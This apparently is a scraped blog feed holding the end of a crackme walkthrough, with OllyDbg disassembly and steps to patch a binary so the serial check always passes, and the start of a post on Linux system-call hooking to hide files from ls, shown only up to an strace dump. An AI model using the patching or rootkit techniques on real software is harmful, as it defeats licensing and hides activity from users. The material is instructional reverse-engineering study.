class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401040 gt; 8A88 10304000 MOV CL,BYTE PTR DS:[EAX+403010]/span/span span class="code-line"span class="x"00401046 . 8888 40314000 MOV BYTE PTR DS:[EAX+403140],CL/span/span span class="code-line"span class="x"0040104C . 40 INC EAX/span/span span class="code-line"span class="x"0040104D . 84C9 TEST CL,CL/span/span span class="code-line"span class="x"0040104F .^75 EF JNZ SHORT SomeCryp.00401040/span/span span class="code-line"/code/pre/div /td/tr/table pThis is simply moving a string from code403010/code to code403140/code and only stops once it hits a code0/code./p pThe data at code403010/code we can see by right clicking on the line (line 1 here) and click emFollow in Dump -gt; Address constant/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-follow-address-constant.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-data.png" width="800"/p pIt will show the following in the dump window:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"00403010 49 78 20 6C 7A 63 74 75 Ix lzctu/span/span span class="code-line"span class="go"00403018 73 64 7A 65 74 67 63 2C sdzetgc,/span/span span class="code-line"span class="go"00403020 20 65 78 20 6E 2D 66 73 ex n-fs/span/span span class="code-line"span class="go"00403028 62 20 28 6E 76 66 6E 75 b (nvfnu/span/span span class="code-line"span class="go"00403030 6A 75 76 75 6A 73 78 2D juvujsx-/span/span span class="code-line"span class="go"00403038 66 73 62 29 20 6A 6E 20 fsb) jn/span/span span class="code-line"span class="go"00403040 65 20 66 65 6E 6A 6C 20 e fenjl/span/span span class="code-line"span class="go"00403048 6C 73 61 74 73 78 72 78 lsatsxrx/span/span span class="code-line"span class="go"00403050 75 20 73 77 20 6E 63 61 u sw nca/span/span span class="code-line"span class="go"00403058 61 72 75 7A 6A 6C 20 71 aruzjl q/span/span span class="code-line"span class="go"00403060 72 63 20 65 68 64 73 7A rc ehdsz/span/span span class="code-line"span class="go"00403068 6A 75 67 61 6E 20 70 67 jugan pg/span/span span class="code-line"span class="go"00403070 6A 6C 67 20 74 72 7A 77 jlg trzw/span/span span class="code-line"span class="go"00403078 73 7A 61 6E 20 6E 76 66 szan nvf/span/span span class="code-line"span class="go"00403080 6E 75 6A 75 76 75 6A 73 nujuvujs/span/span span class="code-line"span class="go"00403088 78 2E 20 49 78 20 66 68 x. Ix fh/span/span span class="code-line"span class="go"00403090 73 6C 71 20 6C 6A 74 67 slq ljtg/span/span span class="code-line"span class="go"00403098 72 7A 6E 2C 20 75 67 72 rzn, ugr/span/span span class="code-line"span class="go"004030A0 63 20 65 7A 72 20 75 63 c ezr uc/span/span span class="code-line"span class="go"004030A8 74 6A 6C 65 68 68 63 20 tjlehhc/span/span span class="code-line"span class="go"004030B0 76 6E 72 6D 20 75 73 20 vnrm us/span/span span class="code-line"span class="go"004030B8 73 66 6E 6C 76 7A 72 20 sfnlvzr/span/span span class="code-line"span class="go"004030C0 75 67 72 20 7A 72 68 65 ugr zrhe/span/span span class="code-line"span class="go"004030C8 75 6A 73 78 6E 67 6A 74 ujsxngjt/span/span span class="code-line"span class="go"004030D0 20 66 72 75 70 72 72 78 fruprrx/span/span span class="code-line"span class="go"004030D8 20 75 67 72 20 71 72 63 ugr qrc/span/span span class="code-line"span class="go"004030E0 20 65 78 6D 20 75 67 72 exm ugr/span/span span class="code-line"span class="go"004030E8 20 6C 6A 74 67 72 7A 75 ljtgrzu/span/span span class="code-line"span class="go"004030F0 72 62 75 2E 00 rbu../span/span span class="code-line"/code/pre/div /td/tr/table pThis is everything before and including the first code0/code./p pOnce this loop has completed we have the following:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401051 . 33C9 XOR ECX,ECX/span/span span class="code-line"span class="x"00401053 . 380D 40314000 CMP BYTE PTR DS:[403140],CL/span/span span class="code-line"span class="x"00401059 . 74 2D JE SHORT SomeCryp.00401088/span/span span class="code-line"span class="x"0040105B . EB 03 JMP SHORT SomeCryp.00401060/span/span span class="code-line"/code/pre/div /td/tr/table pThis zero's out ECX and checks the value at code403140/code against CL (code0/code) and if they match jumps to code00401088/code, otherwise jumps to code00401060/code./p pLet's see what happens if you jump on line 3 is taken:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401088 gt; 83C8 FF OR EAX,FFFFFFFF/span/span span class="code-line"span class="x"0040108B . BA 40314000 MOV EDX,SomeCryp.00403140/span/span span class="code-line"span class="x"00401090 . 85C9 TEST ECX,ECX/span/span span class="code-line"span class="x"00401092 . 74 19 JE SHORT SomeCryp.004010AD/span/span span class="code-line"/code/pre/div /td/tr/table pAnother jump is taken if ECX is code0/code and we know it will at this point. Here is the code at that location:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004010AD gt; F7D0 NOT EAX/span/span span class="code-line"span class="x"004010AF . 3D 18B291F8 CMP EAX,F891B218/span/span span class="code-line"span class="x"004010B4 . 75 10 JNZ SHORT SomeCryp.004010C6/span/span span class="code-line"span class="x"004010B6 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]/span/span span class="code-line"span class="x"004010B9 . C700 40314000 MOV DWORD PTR DS:[EAX],SomeCryp.00403140/span/span span class="code-line"span class="x"004010BF . B0 01 MOV AL,1/span/span span class="code-line"span class="x"004010C1 . 5E POP ESI/span/span span class="code-line"span class="x"004010C2 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010C4 . 5D POP EBP/span/span span class="code-line"span class="x"004010C5 . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the end of the function./p pIts pretty obvious that this function creates a checksum of a modified version of the string we found earlier and checks it against codeF891B218/code, if it is equal the function returns 1, otherwise it return 0./p pAt this point I remember that there are no rules to this crackme so patching is allowed./p pExit OllyDBG completely and make a copy of the application like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/save-copy.png"/p pThis isn't needed, I just do it to be careful./p pOpe the copy and go to the serial checking function and the line under codeCMP AL,61/code, where it says codeJL SomeCryp.004010C6/code at code0040101A/code, double click, type codeje 4010A2/code and click emAssemble/em./p pThe little window should have stayed open, type codejmp 4010C6/code and click emAssemble/em again./p pYou should see the following:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-editing-binary.png" width="800"/p pThis should check if the first character in the serial is stronga/strong and if it is jump to code4010A2/code, otherwise jump to code4010C6/code which is the failure case./p pClick emCancel/em and scroll down the the memory address code4010A2/code. Double click there, type codemov eax, 0xf891b218/code and click emAssemble/em./p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-editing-binary2.png" width="800"/p pNow just fill the rest with a href="https://en.wikipedia.org/wiki/NOP" target="_blank"NOP's/a until the codecmp/code at code004010AF/code like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-nops.png" width="800"/p pThis should ensure that if the serial contains an stronga/strong at the start it should set the value of EAX accordingly./p pSave these modifications to the application file by right clicking anywhere and clicking emCopy to exe-gt;All modifications/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-copy-to-exe.png" width="800"/p pIt should open this window:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-copy-to-exe-dialog.png"/p pClick emCopy all/em and you should see something like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-new-binary.png" width="800"/p pClick the close button in the top right corner of this window and you should get the following dialog:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-save-binary.png"/p pNow if you browse to the directory with the crackme files in you should see a new file:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/new-files.png"/p pThe file ending in strong.bak/strong is the backup created by Olly, and the 1 named codeSomeCrypto~01 - Copy.exe/code is our patched file./p pJust run it and put anything as the name and any serial starting with an stronga/strong:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/complete.png" width="800"/p pCRACKED!!! :-)/p h2Conclusion/h2 pYou don't need to fully understand every part of an application while reverse engineering it, it depends on what you are trying to achieve and the complexity of the application./p pTry to concentrate as much as possible on the important areas and ignore everything else./p pWhen beating a protection mechanism sometimes its easiest to just bypass the protection as opposed to trying to break it./p h2Further Reading/h2 pThe best book I've read on this topic is emReversing: Secrets of Reverse Engineering/em by emEldad Eilam/em./p pHappy Hacking :-)/p
✇eXploit

System Call Hooking

By: 0xe7
pWelcome to the third post on Linux kernel hacking. In the a href="/linux-kernel-hacking/2014/05/10/first-lkm/"first/a we looked at how to create a basic LKM and in the a href="/linux-kernel-hacking/2014/06/06/a-simple-character-device/"second/a we created a character device and communicated with it./p pNow we are going to do something which is obviously very useful for malware, a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a a href="https://en.wikipedia.org/wiki/Hooking" target="_blank"hooking/a./p pHooking a system call means that you are able to manipulate data sent from userland applications to the operating system (OS) and vice versa./p !-- more -- pThis means that you can hide things from applications running on the OS and influence their behaviour./p pHere we will develop an LKM that will hide files from the unix codels/code command./p h2Determining Relevant System Calls/h2 pThe first step is to determine the system calls used by codels/code to list the filenames in a directory./p pcodestrace/code is a tool that can be used to trace every system call used by an application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanstrace ls/span span class="code-line"span class="go"execve(quot;/bin/lsquot;, [quot;lsquot;], [/* 18 vars */]) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7717000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.preloadquot;, R_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/etc/ld.so.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=116616, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 116616, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb76fa000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libselinux.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0pP\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=124904, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 130140, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76da000/span/span span class="code-line"span class="go"mmap2(0xb76f8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d) = 0xb76f8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/librt.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\30\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=30684, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 33360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76d1000/span/span span class="code-line"span class="go"mmap2(0xb76d8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6) = 0xb76d8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libacl.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\32\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34436, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76d0000/span/span span class="code-line"span class="go"mmap2(NULL, 37244, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76c6000/span/span span class="code-line"span class="go"mmap2(0xb76ce000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7) = 0xb76ce000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libc.so.6quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240o\1\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=1441960, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1456504, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7562000/span/span span class="code-line"span class="go"mprotect(0xb76bf000, 4096, PROT_NONE) = 0/span/span span class="code-line"span class="go"mmap2(0xb76c0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15d) = 0xb76c0000/span/span span class="code-line"span class="go"mmap2(0xb76c3000, 10616, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb76c3000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libdl.so.2quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\n\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=9844, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb755e000/span/span span class="code-line"span class="go"mmap2(0xb7560000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7560000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libpthread.so.0quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220L\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=117009, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 98816, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7545000/span/span span class="code-line"span class="go"mmap2(0xb755a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x14) = 0xb755a000/span/span span class="code-line"span class="go"mmap2(0xb755c000, 4608, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb755c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libattr.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\20\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=17864, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 20656, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb753f000/span/span span class="code-line"span class="go"mmap2(0xb7543000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3) = 0xb7543000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753e000/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753d000/span/span span class="code-line"span class="go"set_thread_area({entry_number:-1 -gt; 6, base_addr:0xb753d720, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0/span/span span class="code-line"span class="go"mprotect(0xb7543000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb755a000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7560000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76c0000, 8192, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76ce000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76d8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76f8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0x8063000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7736000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"munmap(0xb76fa000, 116616) = 0/span/span span class="code-line"span class="go"set_tid_address(0xb753d788) = 20395/span/span span class="code-line"span class="go"set_robust_list(0xb753d790, 0xc) = 0/span/span span class="code-line"span class="go"futex(0xbf8906c0, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, bf8906d0) = -1 EAGAIN (Resource temporarily unavailable)/span/span span class="code-line"span class="go"rt_sigaction(SIGRTMIN, {0xb75496e0, [], SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigaction(SIGRT_1, {0xb7549b70, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0/span/span span class="code-line"span class="go"getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0/span/span span class="code-line"span class="go"uname({sys=quot;Linuxquot;, node=quot;devquot;, ...}) = 0/span/span span class="code-line"span class="go"statfs64(quot;/sys/fs/selinuxquot;, 84, 0xbf8905cc) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"statfs64(quot;/selinuxquot;, 84, {f_type=quot;EXT2_SUPER_MAGICquot;, f_bsize=4096, f_blocks=4905183, f_bfree=1413721, f_bavail=1158784, f_files=1256640, f_ffree=807533, f_fsid={-583175880, 1006898437}, f_namelen=255, f_frsize=4096}) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"brk(0x9094000) = 0x9094000/span/span span class="code-line"span class="go"open(quot;/proc/filesystemsquot;, O_RDONLY|O_LARGEFILE) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, 